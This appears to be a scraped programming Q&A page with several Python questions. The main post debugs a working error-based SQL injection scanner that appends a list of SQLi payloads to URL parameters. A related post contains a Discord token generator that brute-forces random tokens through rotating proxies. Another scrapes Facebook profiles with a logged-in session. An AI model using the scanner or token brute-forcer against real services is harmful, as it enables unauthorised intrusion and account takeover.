Unable to remove new lines from list in python scanner - python

I am trying to create a simple error-based SQLI scanner that simply tacks on some common sqli payloads to the ends of query values in urls. I seem to have this working when providing a single url but I cannot get this to work properly when passing a file of urls. The lists of urls with the payloads come back but I have been unable to figure out how to remove the '\n' at the end of each url in the list so that I can request each url.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
from urllib.parse import urlparse, urlunparse, quote_plus
print('\t SQLiScan')
# arguments
def getArgs():
parser = argparse.ArgumentParser(description = 'Error-based SQLi scan')
parser.add_argument('-l', '--list', help='List of target urls')
parser.add_argument('-u', '--url', help='Target url')
args = parser.parse_args()
return args
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(url):
result = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
parsed = urlparse(url)
queries = parsed.query.split('&')
for payload in payloads:
new_query = "&".join(["{}{}".format(query,payload) for query in queries])
parsed = parsed._replace(query=new_query)
result.append(urlunparse(parsed))
request_url = "\n".join(map(str,result))
request_url = quote_plus(request_url, safe='\n:/')
return request_url
if __name__ == '__main__':
args = getArgs()
url = args.url
urls = loadFile(args.list)
appendPayload(url)
This returns a list like this:
['https://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%22\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B1%5D\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B%5D%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%60\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%211111%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27%7C%7C%27asd%27%7C%7C%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27+or+%271%27%3D%271\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211+or+1%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%27or%27%27%3D%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%271+or+1%3D%271']
After updating code, I am still having difficulty requesting each url properly:
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(url):
result = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
parsed = urlparse(url)
queries = parsed.query.split('&')
for payload in payloads:
new_query = "&".join(["{}{}".format(query,payload) for
query in queries])
parsed = parsed._replace(query=new_query)
result.append(urlunparse(parsed))
# request_url = ",".join(map(str, result))
# result = [quote_plus(x, safe='\n:/') for x in result]
print(result)
return result
if __name__ == '__main__':
args = getArgs()
url = args.url
urls = loadFile(args.list)
for url in urls:
request = requests.get(appendPayload(url))
This is returning:
requests.exceptions.InvalidSchema: No connection adapters were found for '["http://exampe.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1"\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[1]\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[]=1\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1`\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*!1111\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'||\'asd\'||\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\' or \'1\'=\'1", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1 or 1=1\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'or\'\'=\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'1 or 1=\'1"]'
Seems like it may have to do with some of the '' appearing in front of the https: in some of the lines
Update:
After much trying, I finally got this working the way I was looking for.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
import sys
import time
from urllib.parse import urlparse, urlunparse, quote_plus
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
print('\t SQLiScan')
# arguments
def getArgs():
parser = argparse.ArgumentParser(description = 'Error-based SQLi scan')
parser.add_argument('-l', '--list', help='List of target urls')
parser.add_argument('-u', '--url', help='Target url')
args = parser.parse_args()
return args
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(data):
targets = []
encoded = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
for url in data:
parsed_url = urlparse(url)
url_queries = parsed_url.query.split("&")
for payload in payloads:
new_query = "&".join([ "{}{}".format(query, payload) for query in url_queries])
parsed = parsed_url._replace(query=new_query)
targets.append(urlunparse(parsed))
for target in targets:
encode = quote_plus(target, safe='\n:/')
encoded.append(encode)
return encoded
args = getArgs()
data = loadFile(args.list)
targets = appendPayload(data)
counter = 0
for target in targets:
counter += 1
print(f'\r{counter} Requests sent', end='', flush=True)
r = requests.get(target, verify=False)
if r.status_code == 500 or r.status_code == 302:
print(r.status_code, + " ", + target)

Related

Error: proxy = next(proxy_pool) StopIteration

I am trying to run a script and it has a standard URL for proxies which allows the script to run fine. Once I add my own proxy URL I am getting the error Error: proxy = next(proxy_pool) StopIteration. My URL is in another file and I can also link that if needed.
Code is below, if anyone can help that would be great.
import string
import os
import requests
import proxygen
from itertools import cycle
import base64
from random import randint
N = input("How many tokens : ")
count = 0
current_path = os.path.dirname(os.path.realpath(__file__))
url = "https://discordapp.com/api/v6/users/#me/library"
while(int(count) < int(N)):
tokens = []
base64_string = "=="
while(base64_string.find("==") != -1):
sample_string = str(randint(000000000000000000, 999999999999999999))
sample_string_bytes = sample_string.encode("ascii")
base64_bytes = base64.b64encode(sample_string_bytes)
base64_string = base64_bytes.decode("ascii")
else:
token = base64_string+"."+random.choice(string.ascii_letters).upper()+''.join(random.choice(string.ascii_letters + string.digits)
for _ in range(5))+"."+''.join(random.choice(string.ascii_letters + string.digits) for _ in range(27))
count += 1
tokens.append(token)
proxies = proxygen.get_proxies()
proxy_pool = cycle(proxies)
for token in tokens:
proxy = next(proxy_pool)
header = {
"Content-Type": "application/json",
"authorization": token
}
try:
r = requests.get(url, headers=header, proxies={'https':"http://"+proxy})
print(r.text)
print(token)
if r.status_code == 200:
print(u"\u001b[32;1m[+] Token Works!\u001b[0m")
f = open(current_path+"/"+"workingtokens.txt", "a")
f.write(token+"\n")
elif "rate limited." in r.text:
print("[-] You are being rate limited.")
else:
print(u"\u001b[31m[-] Invalid Token.\u001b[0m")
except requests.exceptions.ProxyError:
print("BAD PROXY")
tokens.remove(token)
``
Try this code for get_proxies()
import requests
def get_proxies():
#in your example missing schema
url = 'https://proxy.link/list/get/5691264d3b19a600feef69dc3a27368d'
response = requests.get(url)
raw = response.text.split('\n')
proxies = set(raw)
return proxies
Output here

JSONDecodeError: Extra data: line 1 column 8 (char 7)

I've followed a tutorial to scrape from a facebook profile and I keep getting this error:
JSONDecodeError: Extra data: line 1 column 8 (char 7)
Does anyone know what the problem might be?
Here is my python script:
def get_bs(session, url):
#Makes a GET requests using the given Session objectand returns a BeautifulSoup object.
r = None
while True:
r = session.get(url)
if r.ok:
break
return BeautifulSoup(r.text, 'lxml'
#To login
def make_login(session, base_url, credentials):
#Returns a Session object logged in with credentials.
login_form_url = '/login/device-based/regular/login/?refsrc=https%3A'\
'%2F%2Fmobile.facebook.com%2Flogin%2Fdevice-based%2Fedit-user%2F&lwv=100'
params = {'email':credentials['email'], 'pass':credentials['pass']}
while True:
time.sleep(3)
logged_request = session.post(base_url+login_form_url, data=params)
if logged_request.ok:
logging.info('[*] Logged in.')
break
#Crawling FB
def crawl_profile(session, base_url, profile_url, post_limit):
#Goes to profile URL, crawls it and extracts posts URLs.
profile_bs = get_bs(session, profile_url)
n_scraped_posts = 0
scraped_posts = list()
posts_id = None
while n_scraped_posts < post_limit:
try:
posts_id = 'recent'
posts = profile_bs.find('div', id=posts_id).div.div.contents
except Exception:
posts_id = 'structured_composer_async_container'
posts = profile_bs.find('div', id=posts_id).div.div.contents
posts_urls = [a['href'] for a in profile_bs.find_all('a', text='Full Story')]
for post_url in posts_urls:
# print(post_url)
try:
post_data = scrape_post(session, base_url, post_url)
scraped_posts.append(post_data)
except Exception as e:
logging.info('Error: {}'.format(e))
n_scraped_posts += 1
if posts_completed(scraped_posts, post_limit):
break
show_more_posts_url = None
if not posts_completed(scraped_posts, post_limit):
show_more_posts_url = profile_bs.find('div', id=posts_id).next_sibling.a['href']
profile_bs = get_bs(session, base_url+show_more_posts_url)
time.sleep(3)
else:
break
return scraped_posts
def get_bs(session, url):
#Makes a GET requests using the given Session object and returns a BeautifulSoup object.
r = None
while True:
r = session.get(url)
time.sleep(3)
if r.ok:
break
return BeautifulSoup(r.text, 'lxml')
#Scraping FB
def scrape_post(session, base_url, post_url):
#Goes to post URL and extracts post data.
post_data = OrderedDict()
post_bs = get_bs(session, base_url+post_url)
time.sleep(5)
# Here we populate the OrderedDict object
post_data['url'] = post_url
#Find Post main element
try:
post_text_element = post_bs.find('div', id='u_0_0').div
string_groups = [p.strings for p in post_text_element.find_all('p')]
strings = [repr(string) for group in string_groups for string in group]
post_data['text'] = strings
except Exception:
post_data['text'] = []
#Extract post media URL
try:
post_data['media_url'] = post_bs.find('div', id='u_0_0').find('a')['href']
except Exception:
post_data['media_url'] = ''
#Extract remaining data
try:
post_data['comments'] = extract_comments(session, base_url, post_bs, post_url)
except Exception:
post_data['comments'] = []
return dict(post_data)
#Scraping FB
def scrape_post(session, base_url, post_url):
#Goes to post URL and extracts post data.
post_data = OrderedDict()
post_bs = get_bs(session, base_url+post_url)
time.sleep(5)
# Here we populate the OrderedDict object
post_data['url'] = post_url
#Find Post main element
try:
post_text_element = post_bs.find('div', id='u_0_0').div
string_groups = [p.strings for p in post_text_element.find_all('p')]
strings = [repr(string) for group in string_groups for string in group]
post_data['text'] = strings
except Exception:
post_data['text'] = []
#Extract post media URL
try:
post_data['media_url'] = post_bs.find('div', id='u_0_0').find('a')['href']
except Exception:
post_data['media_url'] = ''
#Extract remaining data
try:
post_data['comments'] = extract_comments(session, base_url, post_bs, post_url)
except Exception:
post_data['comments'] = []
return dict(post_data)
#Function for profile URL and creditials for FB
def json_to_obj(filename):
#Extracts data from JSON file and saves it on Python object
obj = None
with open(filename) as json_file:
obj = json.loads(json_file.read())
return obj
def save_data(data):
#Converts data to JSON.
with open('profile_posts_data.json', 'w') as json_file:
json.dump(data, json_file, indent=4)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
base_url = 'https://mobile.facebook.com'
session = requests.session()
# Extracts credentials for the login and all of the profiles URL to scrape
credentials = json_to_obj('credentials.json')
profiles_urls = json_to_obj('profiles_urls.json')
make_login(session, base_url, credentials)
posts_data = None
for profile_url in profiles_urls:
posts_data = crawl_profile(session, base_url, profile_url, 25)
logging.info('[!] Scraping finished. Total: {}'.format(len(posts_data)))
logging.info('[!] Saving.')
save_data(posts_data)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
base_url = 'https://mobile.facebook.com'
session = requests.session()
# Extracts credentials for the login and all of the profiles URL to scrape
credentials = json_to_obj(r"C:\Users\E7450\Desktop\GIS702\FBScrapping\credentials.json")
profiles_urls = json_to_obj(r"C:\Users\E7450\Desktop\GIS702\FBScrapping\profiles_urls.json")
make_login(session, base_url, credentials)
posts_data = None
for profile_url in profiles_urls:
posts_data = crawl_profile(session, base_url, profile_url, 25)
logging.info('[!] Scraping finished. Total: {}'.format(len(posts_data)))
logging.info('[!] Saving.')
save_data(posts_data)

Cannot Process decoded Image files, Flask, OpenCV

I am receiving a bunch of images to the flask app via the client file.
client.py
# Generate the parallel requests based on the ThreadPool Executor
from concurrent.futures import ThreadPoolExecutor as PoolExecutor
import sys
import time
import glob
import requests
import threading
import uuid
import base64
import json
import os
#send http request
def call_object_detection_service(image):
try:
url = str(sys.argv[2])
data = {}
#generate uuid for image
id = uuid.uuid5(uuid.NAMESPACE_OID, image)
# Encode image into base64 string
with open (image, 'rb') as image_file:
data['image'] = base64.b64encode(image_file.read()).decode('utf-8')
data['id'] = str(id)
headers = {'Content-Type': 'application/json'}
response = requests.post(url, json= json.dumps(data), headers = headers)
if response.ok:
output = "Thread : {}, input image: {}, output:{}".format(threading.current_thread().getName(),
image, response.text)
print(output)
else:
print ("Error, response status:{}".format(response))
except Exception as e:
print("Exception in webservice call: {}".format(e))
# gets list of all images path from the input folder
def get_images_to_be_processed(input_folder):
images = []
for image_file in glob.iglob(input_folder + "*.jpg"):
images.append(image_file)
return images
def main():
## provide argumetns-> input folder, url, number of wrokers
if len(sys.argv) != 4:
raise ValueError("Arguments list is wrong. Please use the following format: {} {} {} {}".
format("python iWebLens_client.py", "<input_folder>", "<URL>", "<number_of_workers>"))
input_folder = os.path.join(sys.argv[1], "")
images = get_images_to_be_processed(input_folder)
num_images = len(images)
num_workers = int(sys.argv[3])
start_time = time.time()
#craete a worker thread to invoke the requests in parallel
with PoolExecutor(max_workers=num_workers) as executor:
for _ in executor.map(call_object_detection_service, images):
pass
#elapsed_time = time.time() - start_time
#print("Total time spent: {} average response time: {}".format(elapsed_time, elapsed_time/num_images))
if __name__ == "__main__":
main()
I decode them like so
Flask App
app = Flask(__name__)
c = 1
#app.route('/api/object_detection', methods = ['POST'])
def main():
global c
try:
data = request.get_json(force=True)
uid = data.get('id')
image = data.get('image')
print(image)
im = base64.decodebytes(image)
with open("image{}".format(c), 'wb') as f:
f.write(im)
c += 1
for l in range(128):
img = cv2.imread("image{}".format(l), cv2.IMREAD_ANYCOLOR);
# load the neural net. Should be local to this method as its multi-threaded endpoint
nets = load_model(CFG, Weights)
s = do_prediction(img, nets, Lables)
return jsonify(s)
except Exception as e:
print(e)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True, threaded=True)
This creates the image files with different sizes but I cannot view them in image viewer. The files being recieved are jpg files. Ignoring that, I went ahead with the processing and I get
TypeError: The view function for 'main' did not return a valid response. The function either returned None or ended without a return statement.
Incorrect padding
Incorrect padding
[INFO] loading YOLO from disk...
'NoneType' object has no attribute 'shape'
Images are being sent like this.
python iWebLens_client.py inputfolder/ http://192.168.29.75:5000/api/object_detection 4
The images are being received like this.
b'"{\\"image\\": \\"/9j/4AAQSkZJRgABAQEASABIAAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA......fiU05tQopHNf//Z\\", \\"id\\": \\"e3ad9809-b84c-57f1-bd03-a54e25c59bcc\\"}"'
I am thinking I need to decode('utf-8') this, but don't know how.
Currently, you are double-coding the data on the client side. Within requests, the argument passed is already converted to JSON.
Just pass the dict on as a json parameter.
def call_object_detection_service(image):
try:
url = str(sys.argv[2])
data = {}
#generate uuid for image
id = uuid.uuid5(uuid.NAMESPACE_OID, image)
# Encode image into base64 string
with open (image, 'rb') as image_file:
data['image'] = base64.b64encode(image_file.read()).decode('utf-8')
data['id'] = str(id)
headers = {'Content-Type': 'application/json'}
# HERE IS THE CHANGE !!!
response = requests.post(url, json=data, headers=headers)
if response.ok:
output = "Thread : {}, input image: {}, output:{}".format(
threading.current_thread().getName(),
image,
response.text
)
print(output)
else:
print ("Error, response status:{}".format(response))
except Exception as e:
print("Exception in webservice call: {}".format(e))
The data can now be received on the server as JSON and extracted into a dict.
#app.route('/api/object_detection', methods=['POST'])
def main():
data = request.get_json(force=True)
uid = data.get('id')
image = data.get('image')
# ... decode the base64 data here ...
return jsonify(message='done')

How Do You Write Files to IPFS via the HTTP API in Python

Could someone demonstrate writing a file to IPFS via the HTTP API (/files/write) and Python?
My code is getting messier every time I modify it.
https://pastebin.com/W9eNz1Pb
def api(*argv, **kwargs):
url = "http://127.0.0.1:5001/api/v0/"
for arg in argv:
arg = arg.replace(" ", "/")
if arg[:-1] != "/":
arg += "/"
url += arg
url = url[0:-1]
if kwargs:
url+="?"
for val in kwargs:
if val != "post":
url = url + val + "=" + kwargs[val] + "&"
url = url[0:-1]
print(url)
try:
if "post" in kwargs:
print("POST DATA")
with urllib.request.urlopen(url=url, data=urllib.parse.urlencode(kwargs["post"]).encode("ascii")) as response:
return response.read()
else:
with urllib.request.urlopen(url, timeout=300) as response:
return response.read()
except:
return b"""{"ERROR": "CANNOT CONNECT TO IPFS!"}"""
class file(object):
def __init__(self, p):
self.p = p
if self.p[0] != "/":
self.p = "/" + self.p
def read(self):
return api("files", "read", arg=self.p).decode()
def write(self, s, *argv):
if argv:
return api("files", "write", arg=self.p, offset=str(argv[0]), create="True", parents="True", post={"Data": s})
else:
return api("files", "write", arg=self.p, truncate="True", create="True", parents="True", post={"Data": s})
file.read() works perfectly. But file.write() is being a pain in the rear.
Here's a minimal example to write a file via the /files/write HTTP API in Python:
import requests, urllib
NODE = "http://localhost:5001"
FILE_PATH = "./example" # path to file you're trying to add
MFS_PATH = "/example" # mfs path you're trying to write to
response = requests.post(NODE+"/api/v0/files/write?arg=%s&create=true" % urllib.parse.quote(MFS_PATH), files={FILE_PATH:open(FILE_PATH, 'rb')})
make sure ipfs daemon is running
ipfs init
ipfs daemon
your url endpoint is wrong. If you check documentaion, for adding file, url should be
url = "http://127.0.0.1:5001/api/v0/add"
create a function to upload so u can use this logic in other parts of your project:
def add_to_ipfs(filepath):
from pathlib import Path
import requests
# rb means open in binary. read binary
with Path(filepath).open("rb") as fp:
image_binary=fp.read()
# we need to make post request to this endpoint.
url = "http://127.0.0.1:5001/api/v0/add"
# check the response object
response = requests.post(url, files={"file": image_binary})
ipfs_hash=response.json()["Hash"]
# "./img/myImage.png" -> "myImage.png" split by "/" into array, take the last element
filename=filepath.split("/")[-1:][0]
image_uri=f"https://ipfs.io/ipfs/{ipfs_hash}?filename={filename}"
print("image uri on ipfs",image_uri)
return image_uri
this is the Response type from ipfs
{
"Bytes": "<int64>",
"Hash": "<string>",
"Name": "<string>",
"Size": "<string>"
}

python request urls parallel [duplicate]

This question already has an answer here:
How to send multiple http requests python
(1 answer)
Closed 6 years ago.
I created the following script to download images from an API endpoint which works as intended. Thing is that it is rather slow as all the requests have to wait on each other. What is the correct way to make it possible to still have the steps synchronously for each item I want to fetch, but make it parallel for each individual item. This from an online service called
servicem8
So what I hope to achieve is:
fetch all possible job ids => keep name/and other info
fetch name of the customer
fetch each attachment of a job
These three steps should be done for each job. So I could make things parallel for each job as they do not have to wait on each other.
Update:
Problem I do not understand is how can you make sure that you bundle for example the three calls per item in one call as its only per item that I can do things in parallel so for example when I want to
fetch item( fetch name => fetch description => fetch id)
so its the fetch item I want to make parallel?
The current code I have is working but rather slow:
import requests
import dateutil.parser
import shutil
import os
user = "test#test.com"
passw = "test"
print("Read json")
url = "https://api.servicem8.com/api_1.0/job.json"
r = requests.get(url, auth=(user, passw))
print("finished reading jobs.json file")
scheduled_jobs = []
if r.status_code == 200:
for item in r.json():
scheduled_date = item['job_is_scheduled_until_stamp']
try:
parsed_date = dateutil.parser.parse(scheduled_date)
if parsed_date.year == 2016:
if parsed_date.month == 10:
if parsed_date.day == 10:
url_customer = "https://api.servicem8.com/api_1.0/Company/{}.json".format(item[
'company_uuid'])
c = requests.get(url_customer, auth=(user, passw))
cus_name = c.json()['name']
scheduled_jobs.append(
[item['uuid'], item['generated_job_id'], cus_name])
except ValueError:
pass
for job in scheduled_jobs:
print("fetch for job {}".format(job))
url = "https://api.servicem8.com/api_1.0/Attachment.json?%24filter=related_object_uuid%20eq%20{}".format(job[
0])
r = requests.get(url, auth=(user, passw))
if r.json() == []:
pass
for attachment in r.json():
if attachment['active'] == 1 and attachment['file_type'] != '.pdf':
print("fetch for attachment {}".format(attachment))
url_staff = "https://api.servicem8.com/api_1.0/Staff.json?%24filter=uuid%20eq%20{}".format(
attachment['created_by_staff_uuid'])
s = requests.get(url_staff, auth=(user, passw))
for staff in s.json():
tech = "{}_{}".format(staff['first'], staff['last'])
url = "https://api.servicem8.com/api_1.0/Attachment/{}.file".format(attachment[
'uuid'])
r = requests.get(url, auth=(user, passw), stream=True)
if r.status_code == 200:
creation_date = dateutil.parser.parse(
attachment['timestamp']).strftime("%d.%m.%y")
if not os.path.exists(os.getcwd() + "/{}/{}".format(job[2], job[1])):
os.makedirs(os.getcwd() + "/{}/{}".format(job[2], job[1]))
path = os.getcwd() + "/{}/{}/SC -O {} {}{}".format(
job[2], job[1], creation_date, tech.upper(), attachment['file_type'])
print("writing file to path {}".format(path))
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
print(r.text)
Update [14/10]
I updated the code in the following way with some hints given. Thanks a lot for that. Only thing I could optimize I guess is the attachment downloading but it is working fine now. Funny thing I learned is that you cannot create a CON folder on a windows machine :-) did not know that.
I use pandas as well just to try to avoid some loops in my list of dicts but not sure if I am already most performant. Longest is actually reading in the full json files. I fully read them in as I could not find an API way of just telling the api, return me only the jobs from september 2016. The api query function seems to work on eq/lt/ht.
import requests
import dateutil.parser
import shutil
import os
import pandas as pd
user = ""
passw = ""
FOLDER = os.getcwd()
headers = {"Accept-Encoding": "gzip, deflate"}
import grequests
urls = [
'https://api.servicem8.com/api_1.0/job.json',
'https://api.servicem8.com/api_1.0/Attachment.json',
'https://api.servicem8.com/api_1.0/Staff.json',
'https://api.servicem8.com/api_1.0/Company.json'
]
#Create a set of unsent Requests:
print("Read json files")
rs = (grequests.get(u, auth=(user, passw), headers=headers) for u in urls)
#Send them all at the same time:
jobs,attachments,staffs,companies = grequests.map(rs)
#create dataframes
df_jobs = pd.DataFrame(jobs.json())
df_attachments = pd.DataFrame(attachments.json())
df_staffs = pd.DataFrame(staffs.json())
df_companies = pd.DataFrame(companies.json())
#url_customer = "https://api.servicem8.com/api_1.0/Company/{}.json".format(item['company_uuid'])
#c = requests.get(url_customer, auth=(user, passw))
#url = "https://api.servicem8.com/api_1.0/job.json"
#jobs = requests.get(url, auth=(user, passw), headers=headers)
#print("Reading attachments json")
#url = "https://api.servicem8.com/api_1.0/Attachment.json"
#attachments = requests.get(url, auth=(user, passw), headers=headers)
#print("Reading staff.json")
#url_staff = "https://api.servicem8.com/api_1.0/Staff.json"
#staffs = requests.get(url_staff, auth=(user, passw))
scheduled_jobs = []
if jobs.status_code == 200:
print("finished reading json file")
for job in jobs.json():
scheduled_date = job['job_is_scheduled_until_stamp']
try:
parsed_date = dateutil.parser.parse(scheduled_date)
if parsed_date.year == 2016:
if parsed_date.month == 9:
cus_name = df_companies[df_companies.uuid == job['company_uuid']].iloc[0]['name'].upper()
cus_name = cus_name.replace('/', '')
scheduled_jobs.append([job['uuid'], job['generated_job_id'], cus_name])
except ValueError:
pass
print("{} jobs to fetch".format(len(scheduled_jobs)))
for job in scheduled_jobs:
print("fetch for job attachments {}".format(job))
#url = "https://api.servicem8.com/api_1.0/Attachment.json?%24filter=related_object_uuid%20eq%20{}".format(job[0])
if attachments == []:
pass
for attachment in attachments.json():
if attachment['related_object_uuid'] == job[0]:
if attachment['active'] == 1 and attachment['file_type'] != '.pdf' and attachment['attachment_source'] != 'INVOICE_SIGNOFF':
for staff in staffs.json():
if staff['uuid'] == attachment['created_by_staff_uuid']:
tech = "{}_{}".format(
staff['first'].split()[-1].strip(), staff['last'])
creation_timestamp = dateutil.parser.parse(
attachment['timestamp'])
creation_date = creation_timestamp.strftime("%d.%m.%y")
creation_time = creation_timestamp.strftime("%H_%M_%S")
path = FOLDER + "/{}/{}/SC_-O_D{}_T{}_{}{}".format(
job[2], job[1], creation_date, creation_time, tech.upper(), attachment['file_type'])
# fetch attachment
if not os.path.isfile(path):
url = "https://api.servicem8.com/api_1.0/Attachment/{}.file".format(attachment[
'uuid'])
r = requests.get(url, auth=(user, passw), stream = True)
if r.status_code == 200:
if not os.path.exists(FOLDER + "/{}/{}".format(job[2], job[1])):
os.makedirs(
FOLDER + "/{}/{}".format(job[2], job[1]))
print("writing file to path {}".format(path))
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
print("file already exists")
else:
print(r.text)
General idea is to use asynchronous url requests and there is a python module named grequests for that-https://github.com/kennethreitz/grequests
From Documentation:
import grequests
urls = [
'http://www.heroku.com',
'http://python-tablib.org',
'http://httpbin.org',
'http://python-requests.org',
'http://fakedomain/',
'http://kennethreitz.com'
]
#Create a set of unsent Requests:
rs = (grequests.get(u) for u in urls)
#Send them all at the same time:
grequests.map(rs)
And the resopnse
[<Response [200]>, <Response [200]>, <Response [200]>, <Response [200]>, None, <Response [200]>]

Categories

Resources